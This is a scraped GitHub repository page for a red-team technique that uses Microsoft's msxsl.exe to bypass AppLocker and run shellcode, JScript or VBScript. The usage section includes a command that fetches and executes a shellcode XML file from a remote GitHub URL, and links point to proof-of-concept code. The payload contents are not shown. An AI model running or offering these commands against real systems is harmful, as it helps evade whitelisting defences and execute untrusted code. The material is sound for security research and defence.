Use-msxsl-to-bypass-AppLocker

Learn from Casey Smith@subTee

https://twitter.com/subTee/status/877616321747271680

Usage:

msxsl.exe argv1.xml shellcode.xml/JScript.xml/VBScript.xml

or

msxsl.exe shellcode.xml/JScript.xml/VBScript.xml shellcode.xml/JScript.xml/VBScript.xml

or remote execution(Evi1cg told me)，like this:

msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

shellcode.xml:

Use msxsl to run shellcode.

Combine Casey Smith's msxsl POC and Cn33liz's StarFighters.

Link:

https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1   
https://github.com/Cn33liz/StarFighters/blob/master/StarFighter.js

JScript.xml:

Use JScript to run calc.exe

From: https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1#file-script-xsl

VBScript.xml:

Use VBScript to run calc.exe

Details：

https://3gstudent.github.io/Use-msxsl-to-bypass-AppLocker

Name		Name	Last commit message	Last commit date
Latest commit History 19 Commits
JScript.xml		JScript.xml
README.md		README.md
VBScript.xml		VBScript.xml
argv1.xml		argv1.xml
shellcode.xml		shellcode.xml
shellcode.xsl		shellcode.xsl

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Use-msxsl-to-bypass-AppLocker

Usage:

shellcode.xml:

JScript.xml:

VBScript.xml:

About

Releases

Packages

Languages

3gstudent/Use-msxsl-to-bypass-AppLocker

Folders and files

Latest commit

History

Repository files navigation

Use-msxsl-to-bypass-AppLocker

Usage:

shellcode.xml:

JScript.xml:

VBScript.xml:

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages